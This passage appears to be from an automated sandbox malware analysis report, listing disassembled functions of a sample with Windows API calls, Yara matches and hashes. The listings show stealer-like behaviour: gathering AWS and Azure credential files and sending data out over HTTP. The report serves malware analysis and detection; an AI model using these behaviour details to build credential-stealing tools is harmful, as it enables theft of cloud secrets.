                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • strtok_s.MSVCRT ref: 022E0582
                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022E05C9
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E05D0
                                                            • StrStrA.SHLWAPI(00000000,00421618), ref: 022E05EC
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E05FA
                                                              • Part of subcall function 022E8B47: malloc.MSVCRT ref: 022E8B4F
                                                              • Part of subcall function 022E8B47: strncpy.MSVCRT ref: 022E8B6A
                                                            • StrStrA.SHLWAPI(00000000,00421620), ref: 022E0636
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0644
                                                            • StrStrA.SHLWAPI(00000000,00421628), ref: 022E0680
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E068E
                                                            • StrStrA.SHLWAPI(00000000,00421630), ref: 022E06CA
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E06DC
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0769
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0781
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0799
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E07B1
                                                            • lstrcat.KERNEL32(?,0042164C), ref: 022E07C9
                                                            • lstrcat.KERNEL32(?,00421660), ref: 022E07D8
                                                            • lstrcat.KERNEL32(?,00421670), ref: 022E07E7
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E07FA
                                                            • lstrcat.KERNEL32(?,00421678), ref: 022E0809
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E081C
                                                            • lstrcat.KERNEL32(?,0042167C), ref: 022E082B
                                                            • lstrcat.KERNEL32(?,00421680), ref: 022E083A
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E084D
                                                            • lstrcat.KERNEL32(?,00421688), ref: 022E085C
                                                            • lstrcat.KERNEL32(?,0042168C), ref: 022E086B
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E087E
                                                            • lstrcat.KERNEL32(?,00421698), ref: 022E088D
                                                            • lstrcat.KERNEL32(?,0042169C), ref: 022E089C
                                                            • strtok_s.MSVCRT ref: 022E08E0
                                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E08F5
                                                            • memset.MSVCRT ref: 022E0944
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                            • String ID:
                                                            • API String ID: 3689735781-0
                                                            • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                            • Instruction ID: c70e8987a47bc3c3ee0f4c1b7c5d73c25ddfd72a9a95e22a47af87f929006125
                                                            • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                            • Instruction Fuzzy Hash: 3FD14C75A20308ABCF04EBE4DD85EFE777AAF54300F904419E103A6198EE78AA45DF61
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00405A13
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0087AFD0,00000000,?,00845220,00000000,?,00421A1C), ref: 00405E71
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                            • memcpy.MSVCRT(?), ref: 00405EFE
                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                            • HttpOpenRequestA.WININET(00000000,0087AEF0,?,0087A830,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 1406981993-2180234286
                                                            • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                            • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                            • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                            • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                            APIs
                                                            • memset.MSVCRT ref: 00414D87
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                            • memset.MSVCRT ref: 00414E13
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                            • memset.MSVCRT ref: 00414E9F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00876020,?,000003E8), ref: 00414A4A
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                            • memset.MSVCRT ref: 00414F2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                            • API String ID: 4017274736-156832076
                                                            • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                            • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                            • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                            • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                            • lstrcatA.KERNEL32(?,00000000,00876280,00421474,00876280,00421470,00000000), ref: 0040D208
                                                            • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                            • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                            • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                            • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                            • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                            • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                            • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                            • lstrlenA.KERNEL32(?), ref: 0040D339
                                                            • memset.MSVCRT ref: 0040D388
                                                              • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                            • String ID:
                                                            • API String ID: 2775534915-0
                                                            • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                            • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                            • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                            • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD1EA
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022DD32E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022DD335
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD46F
                                                            • lstrcat.KERNEL32(?,00421478), ref: 022DD47E
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD491
                                                            • lstrcat.KERNEL32(?,0042147C), ref: 022DD4A0
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4B3
                                                            • lstrcat.KERNEL32(?,00421480), ref: 022DD4C2
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4D5
                                                            • lstrcat.KERNEL32(?,00421484), ref: 022DD4E4
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4F7
                                                            • lstrcat.KERNEL32(?,00421488), ref: 022DD506
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD519
                                                            • lstrcat.KERNEL32(?,0042148C), ref: 022DD528
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD53B
                                                            • lstrcat.KERNEL32(?,00421490), ref: 022DD54A
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                            • lstrlen.KERNEL32(?), ref: 022DD591
                                                            • lstrlen.KERNEL32(?), ref: 022DD5A0
                                                            • memset.MSVCRT ref: 022DD5EF
                                                              • Part of subcall function 022EACD7: StrCmpCA.SHLWAPI(0064A350,022DAA0E,?,022DAA0E,0064A350), ref: 022EACF6
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DD61B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                            • String ID:
                                                            • API String ID: 1973479514-0
                                                            • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                            • Instruction ID: beaf0747bffc27c3fc1b1a3eea6341950931f12f600e6f84c59043fa2ccd1e59
                                                            • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                            • Instruction Fuzzy Hash: 8CE14B75960308ABCF08FBE4DD95EEE737ABF64301F904159E107A61A4DE34AA08DF61
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D5C5F
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D5C7A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D5DFA
                                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022D60D8
                                                            • lstrlen.KERNEL32(00000000), ref: 022D60E9
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D60FA
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D6101
                                                            • lstrlen.KERNEL32(00000000), ref: 022D6116
                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 022D612D
                                                            • lstrlen.KERNEL32(00000000), ref: 022D613F
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D6158
                                                            • memcpy.MSVCRT(?), ref: 022D6165
                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 022D6182
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D6196
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022D61B3
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6217
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6224
                                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D5E5F
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D622E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                            • String ID:
                                                            • API String ID: 1703137719-0
                                                            • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                            • Instruction ID: a9242f6e855a41c5ae0169ec2983eb5f566070e44f36976ba87d8ea55160db85
                                                            • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                            • Instruction Fuzzy Hash: 4F12BA71960328AACF15EBE4DD95EEEB37ABF64700F804199A10762194EF742B88DF50
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 0040493A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0087AEC0), ref: 00404DE8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                            • HttpOpenRequestA.WININET(00000000,0087AEF0,?,0087A830,00000000,00000000,00400100,00000000), ref: 00404B15
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 2402878923-2180234286
                                                            • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                            • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                            • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                            • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
